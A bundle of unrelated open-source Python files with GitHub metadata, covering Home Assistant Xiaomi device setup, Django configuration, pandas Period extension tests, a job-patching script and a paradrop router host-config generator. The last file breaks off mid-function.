DEVICE_CONFIG = vol.Schema({vol.Required(CONF_HOST): str}).extend(DEVICE_SETTINGS)
DEVICE_MODEL_CONFIG = vol.Schema({vol.Required(CONF_MODEL): vol.In(MODELS_ALL)})
DEVICE_CLOUD_CONFIG = vol.Schema(
{
vol.Optional(CONF_CLOUD_USERNAME): str,
vol.Optional(CONF_CLOUD_PASSWORD): str,
vol.Optional(CONF_CLOUD_COUNTRY, default=DEFAULT_CLOUD_COUNTRY): vol.In(
SERVER_COUNTRY_CODES
),
vol.Optional(CONF_MANUAL, default=False): bool,
}
)
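# Note: calling a voluptuous schema validates and normalizes a dict, e.g.
# DEVICE_CLOUD_CONFIG({}) returns {CONF_CLOUD_COUNTRY: DEFAULT_CLOUD_COUNTRY,
# CONF_MANUAL: False}, while a value of the wrong type raises vol.Invalid.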
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Options for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Init object."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
errors = {}
if user_input is not None:
use_cloud = user_input.get(CONF_CLOUD_SUBDEVICES, False)
cloud_username = self.config_entry.data.get(CONF_CLOUD_USERNAME)
cloud_password = self.config_entry.data.get(CONF_CLOUD_PASSWORD)
cloud_country = self.config_entry.data.get(CONF_CLOUD_COUNTRY)
if use_cloud and (
not cloud_username or not cloud_password or not cloud_country
):
errors["base"] = "cloud_credentials_incomplete"
# trigger re-auth flow
self.hass.async_create_task(
self.hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH},
data=self.config_entry.data,
)
)
if not errors:
return self.async_create_entry(title="", data=user_input)
settings_schema = vol.Schema(
{
vol.Optional(
CONF_CLOUD_SUBDEVICES,
default=self.config_entry.options.get(CONF_CLOUD_SUBDEVICES, False),
): bool
}
)
return self.async_show_form(
step_id="init", data_schema=settings_schema, errors=errors
)
class XiaomiMiioFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a Xiaomi Miio config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize."""
self.host: str | None = None
self.mac: str | None = None
self.token = None
self.model = None
self.name = None
self.cloud_username = None
self.cloud_password = None
self.cloud_country = None
self.cloud_devices: dict[str, dict[str, Any]] = {}
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlowHandler:
"""Get the options flow."""
return OptionsFlowHandler(config_entry)
async def async_step_reauth(self, entry_data: Mapping[str, Any]) -> FlowResult:
"""Perform reauth upon an authentication error or missing cloud credentials."""
self.host = entry_data[CONF_HOST]
self.token = entry_data[CONF_TOKEN]
self.mac = entry_data[CONF_MAC]
self.model = entry_data.get(CONF_MODEL)
return await self.async_step_reauth_confirm()
async def async_step_reauth_confirm(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Dialog that informs the user that reauth is required."""
if user_input is not None:
return await self.async_step_cloud()
return self.async_show_form(step_id="reauth_confirm")
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initialized by the user."""
return await self.async_step_cloud()
async def async_step_zeroconf(
self, discovery_info: zeroconf.ZeroconfServiceInfo
) -> FlowResult:
"""Handle zeroconf discovery."""
name = discovery_info.name
self.host = discovery_info.host
self.mac = discovery_info.properties.get("mac")
if self.mac is None:
poch = discovery_info.properties.get("poch", "")
if (result := search(r"mac=\w+", poch)) is not None:
self.mac = result.group(0).split("=")[1]
if not name or not self.host or not self.mac:
return self.async_abort(reason="not_xiaomi_miio")
self.mac = format_mac(self.mac)
# Check which device is discovered.
for gateway_model in MODELS_GATEWAY:
if name.startswith(gateway_model.replace(".", "-")):
unique_id = self.mac
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured({CONF_HOST: self.host})
self.context.update(
{"title_placeholders": {"name": f"Gateway {self.host}"}}
)
return await self.async_step_cloud()
for device_model in MODELS_ALL_DEVICES:
if name.startswith(device_model.replace(".", "-")):
unique_id = self.mac
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured({CONF_HOST: self.host})
self.context.update(
{"title_placeholders": {"name": f"{device_model} {self.host}"}}
)
return await self.async_step_cloud()
# Discovered device is not yet supported
_LOGGER.debug(
"Not yet supported Xiaomi Miio device '%s' discovered with host %s",
name,
self.host,
)
return self.async_abort(reason="not_xiaomi_miio")
def extract_cloud_info(self, cloud_device_info: dict[str, Any]) -> None:
"""Extract the cloud info."""
if self.host is None:
self.host = cloud_device_info["localip"]
if self.mac is None:
self.mac = format_mac(cloud_device_info["mac"])
if self.model is None:
self.model = cloud_device_info["model"]
if self.name is None:
self.name = cloud_device_info["name"]
self.token = cloud_device_info["token"]
async def async_step_cloud(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Configure a xiaomi miio device through the Miio Cloud."""
errors = {}
if user_input is not None:
if user_input[CONF_MANUAL]:
return await self.async_step_manual()
cloud_username = user_input.get(CONF_CLOUD_USERNAME)
cloud_password = user_input.get(CONF_CLOUD_PASSWORD)
cloud_country = user_input.get(CONF_CLOUD_COUNTRY)
if not cloud_username or not cloud_password or not cloud_country:
errors["base"] = "cloud_credentials_incomplete"
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
miio_cloud = MiCloud(cloud_username, cloud_password)
try:
if not await self.hass.async_add_executor_job(miio_cloud.login):
errors["base"] = "cloud_login_error"
except MiCloudAccessDenied:
errors["base"] = "cloud_login_error"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in Miio cloud login")
return self.async_abort(reason="unknown")
if errors:
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
try:
devices_raw = await self.hass.async_add_executor_job(
miio_cloud.get_devices, cloud_country
)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in Miio cloud get devices")
return self.async_abort(reason="unknown")
if not devices_raw:
errors["base"] = "cloud_no_devices"
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
self.cloud_devices = {}
for device in devices_raw:
if not device.get("parent_id"):
name = device["name"]
model = device["model"]
list_name = f"{name} - {model}"
self.cloud_devices[list_name] = device
self.cloud_username = cloud_username
self.cloud_password = cloud_password
self.cloud_country = cloud_country
if self.host is not None:
for device in self.cloud_devices.values():
cloud_host = device.get("localip")
if cloud_host == self.host:
self.extract_cloud_info(device)
return await self.async_step_connect()
if len(self.cloud_devices) == 1:
self.extract_cloud_info(list(self.cloud_devices.values())[0])
return await self.async_step_connect()
return await self.async_step_select()
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
async def async_step_select(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle multiple cloud devices found."""
errors: dict[str, str] = {}
if user_input is not None:
cloud_device = self.cloud_devices[user_input["select_device"]]
self.extract_cloud_info(cloud_device)
return await self.async_step_connect()
select_schema = vol.Schema(
{vol.Required("select_device"): vol.In(list(self.cloud_devices))}
)
return self.async_show_form(
step_id="select", data_schema=select_schema, errors=errors
)
async def async_step_manual(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Configure a xiaomi miio device Manually."""
errors: dict[str, str] = {}
if user_input is not None:
self.token = user_input[CONF_TOKEN]
if user_input.get(CONF_HOST):
self.host = user_input[CONF_HOST]
return await self.async_step_connect()
if self.host:
schema = vol.Schema(DEVICE_SETTINGS)
else:
schema = DEVICE_CONFIG
return self.async_show_form(step_id="manual", data_schema=schema, errors=errors)
async def async_step_connect(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Connect to a xiaomi miio device."""
errors: dict[str, str] = {}
if self.host is None or self.token is None:
return self.async_abort(reason="incomplete_info")
if user_input is not None:
self.model = user_input[CONF_MODEL]
# Try to connect to a Xiaomi Device.
connect_device_class = ConnectXiaomiDevice(self.hass)
try:
await connect_device_class.async_connect_device(self.host, self.token)
except AuthException:
if self.model is None:
errors["base"] = "wrong_token"
except SetupException:
if self.model is None:
errors["base"] = "cannot_connect"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in connect Xiaomi device")
return self.async_abort(reason="unknown")
device_info = connect_device_class.device_info
if self.model is None and device_info is not None:
self.model = device_info.model
if self.model is None and not errors:
errors["base"] = "cannot_connect"
if errors:
return self.async_show_form(
step_id="connect", data_schema=DEVICE_MODEL_CONFIG, errors=errors
)
if self.mac is None and device_info is not None:
self.mac = format_mac(device_info.mac_address)
unique_id = self.mac
existing_entry = await self.async_set_unique_id(
unique_id, raise_on_progress=False
)
if existing_entry:
data = existing_entry.data.copy()
data[CONF_HOST] = self.host
data[CONF_TOKEN] = self.token
if (
self.cloud_username is not None
and self.cloud_password is not None
and self.cloud_country is not None
):
data[CONF_CLOUD_USERNAME] = self.cloud_username
data[CONF_CLOUD_PASSWORD] = self.cloud_password
data[CONF_CLOUD_COUNTRY] = self.cloud_country
if self.hass.config_entries.async_update_entry(existing_entry, data=data):
await self.hass.config_entries.async_reload(existing_entry.entry_id)
return self.async_abort(reason="reauth_successful")
if self.name is None:
self.name = self.model
flow_type = None
for gateway_model in MODELS_GATEWAY:
if self.model.startswith(gateway_model):
flow_type = CONF_GATEWAY
if flow_type is None:
for device_model in MODELS_ALL_DEVICES:
if self.model.startswith(device_model):
flow_type = CONF_DEVICE
if flow_type is not None:
return self.async_create_entry(
title=self.name,
data={
CONF_FLOW_TYPE: flow_type,
CONF_HOST: self.host,
CONF_TOKEN: self.token,
CONF_MODEL: self.model,
CONF_MAC: self.mac,
CONF_CLOUD_USERNAME: self.cloud_username,
CONF_CLOUD_PASSWORD: self.cloud_password,
CONF_CLOUD_COUNTRY: self.cloud_country,
},
)
errors["base"] = "unknown_device"
return self.async_show_form(
step_id="connect", data_schema=DEVICE_MODEL_CONFIG, errors=errors
)
|
{
"content_hash": "5718343be334c038ce8e7e5580823801",
"timestamp": "",
"source": "github",
"line_count": 422,
"max_line_length": 88,
"avg_line_length": 37.002369668246445,
"alnum_prop": 0.5766250400256164,
"repo_name": "mezz64/home-assistant",
"id": "70e6fb5c0b6bedf23d88e4e73bd9d87932002ce0",
"size": "15615",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/xiaomi_miio/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from starbowmodweb.ladder.models import Map, Client, BattleNetCharacter, CrashReport
import modeladmins
admin.site.register(Map, modeladmins.MapModelAdmin)
admin.site.register(Client, modeladmins.ClientModelAdmin)
# admin.site.register(ClientRegionStats)
# admin.site.register(MatchmakerMatch)
# admin.site.register(MatchmakerMatchParticipant)
# admin.site.register(MatchResultPlayer)
# admin.site.register(MatchResult)
admin.site.register(BattleNetCharacter)
admin.site.register(CrashReport)
|
{
"content_hash": "0f1cfaf16ea0556c1da55683e591eec6",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 84,
"avg_line_length": 37.714285714285715,
"alnum_prop": 0.8446969696969697,
"repo_name": "Starbow/StarbowWebSite",
"id": "9cf67cd03e8f3410d3836110ee44503afbc6d187",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "starbowmodweb/ladder/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "15336"
},
{
"name": "HTML",
"bytes": "24427"
},
{
"name": "JavaScript",
"bytes": "319"
},
{
"name": "Python",
"bytes": "110503"
}
],
"symlink_target": ""
}
|
import os
import numpy as np
if __name__ == "__main__":
## which have already been run?
enumerate_dir = os.path.join(os.getcwd(),'enumerateOutput')
if len(os.listdir(enumerate_dir))==1:
results_dir = os.path.join(enumerate_dir,os.listdir(enumerate_dir)[0])
print 'Results dir is: {}'.format(results_dir)
completed_inds = map(int,[i.split('_')[2] for i in os.listdir(results_dir)])
## which still need to be run
still_to_run = [i for i in np.arange(1,200,2) if i not in completed_inds]
print 'These still yet to run: {}'.format(still_to_run)
## identify how many different new RSA.py calls to make
## by getting list of straggler lower bounds
straggler_lb = np.where(np.diff(still_to_run) !=2)[0]
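        ## worked example: still_to_run == [1, 3, 9, 11] gives
        ## np.diff == [2, 6, 2], so straggler_lb == [1] (a gap after 3)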
if len(straggler_lb)==0:
print 'No stragglers, run them all.'
## which split?
which_split = os.listdir(results_dir)[0].split('_')[0]
if len(still_to_run)>0:
## go through and run RSA.py for earliest to latest in list of still to run
lb = still_to_run[0]
ub = still_to_run[-1]
print 'Lower bound: {} Upper bound: {}'.format(lb, ub)
cmd_string = 'python RSA.py --wppl BDA-enumerate --sim_scaling_lb {} --sim_scaling_ub {} --step_size 2 --split_type {}'.format(lb, ub, which_split)
print 'Running: {}'.format(cmd_string)
os.system(cmd_string)
else:
print 'No more left to run, you should be all set.'
else:
print 'There is more than one dir in enumerateOutput. This (barebones) script designed to handle case where there is only one dir in enumerateOutput to patch.'
|
{
"content_hash": "e1b512712df981c37758a405c3e2417a",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 161,
"avg_line_length": 34.86363636363637,
"alnum_prop": 0.6714471968709257,
"repo_name": "judithfan/graphcomm",
"id": "2cdabed235e6fd9fa9465c8d107b7810419123a2",
"size": "1534",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/bda_enumerate_job_patcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "51808"
},
{
"name": "HTML",
"bytes": "74338"
},
{
"name": "JavaScript",
"bytes": "6970960"
},
{
"name": "Shell",
"bytes": "83"
},
{
"name": "TeX",
"bytes": "23048"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
SETTINGS_TYPES = {
"RECAPTCHA_DOMAIN": str,
"RECAPTCHA_PRIVATE_KEY": str,
"RECAPTCHA_PROXY": dict,
"RECAPTCHA_PUBLIC_KEY": str,
"RECAPTCHA_VERIFY_REQUEST_TIMEOUT": int,
}
# Validate settings types.
for variable, instance_type in SETTINGS_TYPES.items():
if hasattr(settings, variable) \
and not isinstance(getattr(settings, variable), instance_type):
        raise ImproperlyConfigured(
            "Setting %s is not of type %s" % (variable, instance_type)
        )
default_app_config = "captcha.apps.CaptchaConfig"
|
{
"content_hash": "457ad80805328cf1da58d567cd91d03b",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 75,
"avg_line_length": 30.523809523809526,
"alnum_prop": 0.6957878315132605,
"repo_name": "praekelt/django-recaptcha",
"id": "17d92a7b95f59d5392c1af3fec22f949650833d4",
"size": "641",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "captcha/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3199"
},
{
"name": "Python",
"bytes": "38695"
}
],
"symlink_target": ""
}
|
version_info = {'branch_nick': u'LOCALBRANCH',
'revision_id': 'LOCALREVISION',
'revno': 0}
HORIZON_VERSION = ['2012', '2', None]
YEAR, COUNT, REVISION = HORIZON_VERSION
FINAL = True # This becomes true at Release Candidate time
def canonical_version_string():
return '.'.join(filter(None, HORIZON_VERSION))
def version_string():
if FINAL:
return canonical_version_string()
else:
return '%s-dev' % (canonical_version_string(),)
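# With the values above, canonical_version_string() returns "2012.2";
# version_string() returns the same, or "2012.2-dev" when FINAL is False.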
|
{
"content_hash": "130e45cbe8221cb10d5719b94aa36beb",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 60,
"avg_line_length": 26.05263157894737,
"alnum_prop": 0.6222222222222222,
"repo_name": "tylertian/Openstack",
"id": "1db0857a4e40cf213b846f07ee7dfb7b62b9e9af",
"size": "1149",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack F/horizon/horizon/version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "239919"
},
{
"name": "JavaScript",
"bytes": "156942"
},
{
"name": "Python",
"bytes": "16949418"
},
{
"name": "Shell",
"bytes": "96743"
}
],
"symlink_target": ""
}
|
"""dais URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
#import user
#import home
urlpatterns = [
url(r'^', include('home.urls')),
url(r'^ajax/', include('ajax.urls')),
url(r'^home/', include('home.urls')),
url(r'^post/', include('post.urls')),
url(r'^user/', include('user.urls')),
url(r'^error/', include('error.urls')),
url(r'^daisadmin/', include('daisadmin.urls')),
url(r'^politics/', include('politics.urls')),
]
|
{
"content_hash": "62578e78b501344e98cc98764ccd7c27",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 79,
"avg_line_length": 35.774193548387096,
"alnum_prop": 0.6636609558160504,
"repo_name": "amitdhiman000/dais",
"id": "6120a889d0878333c118f432c87fef0c21d89750",
"size": "1109",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dais/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3340"
},
{
"name": "HTML",
"bytes": "101233"
},
{
"name": "JavaScript",
"bytes": "22466"
},
{
"name": "Python",
"bytes": "94519"
}
],
"symlink_target": ""
}
|
"""
SAGA.database
This subpackage contains database-related routines, including Database
"""
from .core import *
from .saga_database import *
|
{
"content_hash": "53bb71b88c83208e9abb6b43fc096661",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 70,
"avg_line_length": 18,
"alnum_prop": 0.7638888888888888,
"repo_name": "sagasurvey/saga",
"id": "7f022be3405d60f5fe8280387481a6b1591501e6",
"size": "144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SAGA/database/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "376969"
},
{
"name": "Shell",
"bytes": "71"
}
],
"symlink_target": ""
}
|
import numpy as np
import pytest
import pandas as pd
import pandas.util.testing as tm
from pandas._libs.tslib import iNaT
from pandas.core.arrays import PeriodArray
from pandas.core.dtypes.dtypes import PeriodDtype
from pandas.tests.extension import base
@pytest.fixture
def dtype():
return PeriodDtype(freq='D')
@pytest.fixture
def data(dtype):
return PeriodArray(np.arange(1970, 2070), freq=dtype.freq)
@pytest.fixture
def data_for_sorting(dtype):
return PeriodArray([2018, 2019, 2017], freq=dtype.freq)
@pytest.fixture
def data_missing(dtype):
return PeriodArray([iNaT, 2017], freq=dtype.freq)
@pytest.fixture
def data_missing_for_sorting(dtype):
return PeriodArray([2018, iNaT, 2017], freq=dtype.freq)
@pytest.fixture
def data_for_grouping(dtype):
B = 2018
NA = iNaT
A = 2017
C = 2019
return PeriodArray([B, B, NA, NA, A, A, B, C], freq=dtype.freq)
@pytest.fixture
def na_value():
return pd.NaT
class BasePeriodTests(object):
pass
class TestPeriodDtype(BasePeriodTests, base.BaseDtypeTests):
pass
class TestConstructors(BasePeriodTests, base.BaseConstructorsTests):
pass
class TestGetitem(BasePeriodTests, base.BaseGetitemTests):
pass
class TestMethods(BasePeriodTests, base.BaseMethodsTests):
def test_combine_add(self, data_repeated):
# Period + Period is not defined.
pass
class TestInterface(BasePeriodTests, base.BaseInterfaceTests):
def test_no_values_attribute(self, data):
# We have a values attribute.
pass
class TestArithmeticOps(BasePeriodTests, base.BaseArithmeticOpsTests):
implements = {'__sub__', '__rsub__'}
def test_arith_series_with_scalar(self, data, all_arithmetic_operators):
        # we implement subtraction...
if all_arithmetic_operators in self.implements:
s = pd.Series(data)
self.check_opname(s, all_arithmetic_operators, s.iloc[0],
exc=None)
else:
# ... but not the rest.
super(TestArithmeticOps, self).test_arith_series_with_scalar(
data, all_arithmetic_operators
)
def test_arith_series_with_array(self, data, all_arithmetic_operators):
if all_arithmetic_operators in self.implements:
s = pd.Series(data)
self.check_opname(s, all_arithmetic_operators, s.iloc[0],
exc=None)
else:
# ... but not the rest.
            super(TestArithmeticOps, self).test_arith_series_with_array(
                data, all_arithmetic_operators
            )
def _check_divmod_op(self, s, op, other, exc=NotImplementedError):
super(TestArithmeticOps, self)._check_divmod_op(
s, op, other, exc=TypeError
)
def test_add_series_with_extension_array(self, data):
# we don't implement + for Period
s = pd.Series(data)
msg = (r"unsupported operand type\(s\) for \+: "
r"\'PeriodArray\' and \'PeriodArray\'")
with tm.assert_raises_regex(TypeError, msg):
s + data
def test_error(self):
pass
def test_direct_arith_with_series_returns_not_implemented(self, data):
# Override to use __sub__ instead of __add__
other = pd.Series(data)
result = data.__sub__(other)
assert result is NotImplemented
class TestCasting(BasePeriodTests, base.BaseCastingTests):
pass
class TestComparisonOps(BasePeriodTests, base.BaseComparisonOpsTests):
def _compare_other(self, s, data, op_name, other):
# the base test is not appropriate for us. We raise on comparison
# with (some) integers, depending on the value.
pass
class TestMissing(BasePeriodTests, base.BaseMissingTests):
pass
class TestReshaping(BasePeriodTests, base.BaseReshapingTests):
pass
class TestSetitem(BasePeriodTests, base.BaseSetitemTests):
pass
class TestGroupby(BasePeriodTests, base.BaseGroupbyTests):
pass
|
{
"content_hash": "29b8c6f3e93061ac871821637be8a958",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 76,
"avg_line_length": 25.941935483870967,
"alnum_prop": 0.6600348172096493,
"repo_name": "amolkahat/pandas",
"id": "6f59cbb66a145d65c274df0c394bd0b2a8a1e90a",
"size": "4021",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pandas/tests/extension/test_period.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4907"
},
{
"name": "C",
"bytes": "404689"
},
{
"name": "C++",
"bytes": "17194"
},
{
"name": "HTML",
"bytes": "551714"
},
{
"name": "Makefile",
"bytes": "574"
},
{
"name": "Python",
"bytes": "14254373"
},
{
"name": "Shell",
"bytes": "28262"
},
{
"name": "Smarty",
"bytes": "2069"
}
],
"symlink_target": ""
}
|
import tests
class ATestCase(tests.BaseTestCase):
def test_logging_configuration_loaded(self):
self.assertTrue(self.logger is not None)
def test_configuration_loaded(self):
self.assertTrue(self.configuration is not None)
def test_configuration_contents(self):
        self.assertIn('vermazelend', self.configuration)
        self.assertIn('key', self.configuration['vermazelend'])
        self.assertEqual(self.configuration['vermazelend']['key'], 'value')
|
{
"content_hash": "5268395fb9bba3d8bc1af5eaadc18b3e",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 76,
"avg_line_length": 33.266666666666666,
"alnum_prop": 0.7154308617234469,
"repo_name": "collectdbit/verzamelend",
"id": "68fa01ae632bd222ab280c4cd71163d43f8057ad",
"size": "499",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/basic_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "29075"
},
{
"name": "Shell",
"bytes": "63"
}
],
"symlink_target": ""
}
|
from django.core.management.base import BaseCommand
from corehq.apps.domain.models import Domain
class Command(BaseCommand):
help = "Marks most recent snapshot of a domain"
args = ""
def handle(self, *args, **options):
print "Migrating snapshot documents to have a marked head"
for domain in Domain.get_all(include_docs=False):
head = Domain.view(
'domain/snapshots',
startkey=[domain['id'], {}],
endkey=[domain['id'], None],
reduce=False,
include_docs=True,
descending=True,
limit=1
).first()
if head:
head.snapshot_head = True
head.save()
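# Invoked like any other management command, e.g.:
#
#   python manage.py mark_snapshot_head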
|
{
"content_hash": "0b668dfe6be41c036bc7097b812d8e72",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 66,
"avg_line_length": 31.375,
"alnum_prop": 0.5378486055776892,
"repo_name": "qedsoftware/commcare-hq",
"id": "3afdaa6c2ae64bb8fa42c067a730a1282432a601",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/apps/domain/management/commands/mark_snapshot_head.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
}
|
"""
The host configuration controls system settings of the host OS.
This module operates as follows:
1. The first time, we try to detect all devices and auto-generate
a reasonable configuration, which we store to a persistent file.
2. (TODO) We present the configuration to the owner sometime around
provisioning or first chute creation and allow him to change settings.
3. (TODO) We have some kind of update operation that can manipulate
settings.
"""
import ipaddress
import jsonpatch
import yaml
from paradrop.base import settings
from paradrop.lib.utils import pdosq
from . import devices as config_devices
# This patch ensures the "unicode" function exists and behaves consistently
# between Python 2 and 3. Normally, it is recommended to use "builtins.str" for
# compatibility, but that uses a different class type not recognized by PyYAML.
try:
unicode('')
except NameError:
unicode = str
CHANNELS_24G = [1, 6, 11]
CHANNELS_5G = [36, 40, 44, 48, 149, 153, 157, 161, 165]
WIFI_DEVICE_CAPS = {
# WLE200NX
("0x168c", "0x002a"): {
"hwmode": ["11a", "11g"]
},
# WLE600VX
("0x168c", "0x003c"): {
"hwmode": ["11a", "11g"]
},
"default": {
"hwmode": ["11g"]
}
}
WIFI_DEVICE_PROFILE = {
# WLE200NX
("0x168c", "0x002a"): {
"htmode": "HT20",
"tx_stbc": 1,
"rx_stbc": 1,
"short_gi_40": True,
},
# WLE600VX
("0x168c", "0x003c"): {
"htmode": "VHT20",
"tx_stbc": 1,
"rx_stbc": 1,
"short_gi_20": True,
"short_gi_40": True,
"short_gi_80": True
},
"default": {}
}
def save(config, path=None):
"""
Save host configuration.
May raise exception if unable to write the configuration file.
"""
if path is None:
path = settings.HOST_CONFIG_FILE
with open(path, 'w') as output:
output.write(yaml.safe_dump(config, default_flow_style=False))
def load(path=None):
"""
Load host configuration.
Tries to load host configuration from persistent file. If that does not
work, it will try to automatically generate a working configuration.
Returns a host config object on success or None on failure.
"""
if path is None:
path = settings.HOST_CONFIG_FILE
return pdosq.read_yaml_file(path, default=None)
def generateHostConfig(devices):
"""
Scan for devices on the machine and generate a working configuration.
"""
config = dict()
default_lan_network = ipaddress.ip_network(unicode(settings.DEFAULT_LAN_NETWORK))
config['firewall'] = {
'defaults': {
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT'
}
}
config['lan'] = {
'interfaces': list(),
'proto': 'static',
'ipaddr': settings.DEFAULT_LAN_ADDRESS,
'netmask': unicode(default_lan_network.netmask),
'dhcp': {
'start': 100,
'limit': 100,
'leasetime': '12h'
},
'firewall': {
'defaults': {
'conntrack': '1',
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT'
},
'forwarding': []
}
}
config['wifi'] = list()
config['wifi-interfaces'] = list()
config['system'] = {
'autoUpdate': True,
'chuteSubnetPool': settings.DYNAMIC_NETWORK_POOL,
'chutePrefixSize': 24,
'onMissingWiFi': None
}
config['telemetry'] = {
'enabled': True,
'interval': 60
}
config['zerotier'] = {
'enabled': True,
'networks': []
}
if len(devices['wan']) > 0:
wanDev = devices['wan'][0]
config['wan'] = {
'interface': wanDev['name'],
'proto': 'dhcp',
'firewall': {
'defaults': {
'conntrack': '1',
'masq': '1',
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT',
'masq_src': [
settings.DEFAULT_LAN_NETWORK,
settings.DYNAMIC_NETWORK_POOL
]
}
}
}
# Add a rule that forwards LAN traffic to WAN.
config['lan']['firewall']['forwarding'].append({
'src': 'lan',
'dest': 'wan'
})
for lanDev in devices['lan']:
config['lan']['interfaces'].append(lanDev['name'])
# Counters to help with channel assignment.
serial = config_devices.get_hardware_serial()
wifi_24_assigned = 0
wifi_5_assigned = 0
for wifiDev in devices['wifi']:
pair = (wifiDev['vendor'], wifiDev['device'])
if pair in WIFI_DEVICE_PROFILE:
new_config = WIFI_DEVICE_PROFILE[pair].copy()
wifi_caps = WIFI_DEVICE_CAPS[pair]
else:
new_config = WIFI_DEVICE_PROFILE['default'].copy()
wifi_caps = WIFI_DEVICE_CAPS["default"]
# Skip odd devices that are missing this field.
if 'id' not in wifiDev:
continue
new_config['id'] = wifiDev['id']
# This logic will assign a 5 Ghz channel to the first 5 Ghz-capable
# device. It will then alternate between 2.4 Ghz and 5 Ghz.
choose_5g = "11a" in wifi_caps.get('hwmode', []) and \
wifi_5_assigned <= wifi_24_assigned
if choose_5g:
chan_index = (serial + wifi_5_assigned) % len(CHANNELS_5G)
new_config['channel'] = CHANNELS_5G[chan_index]
new_config['hwmode'] = "11a"
wifi_5_assigned += 1
else:
chan_index = (serial + wifi_24_assigned) % len(CHANNELS_24G)
new_config['channel'] = CHANNELS_24G[chan_index]
new_config['hwmode'] = "11g"
wifi_24_assigned += 1
config['wifi'].append(new_config)
if len(config['wifi']) > 0 and settings.DEFAULT_WIRELESS_ENABLED:
# If we detect WiFi devices now, configure the system to warn if they
# are missing later. Production systems should be configured with
# "reboot".
config['system']['onMissingWiFi'] = "warn"
# Add a default WiFi AP for usability.
new_iface = {
'device': devices['wifi'][0]['id'],
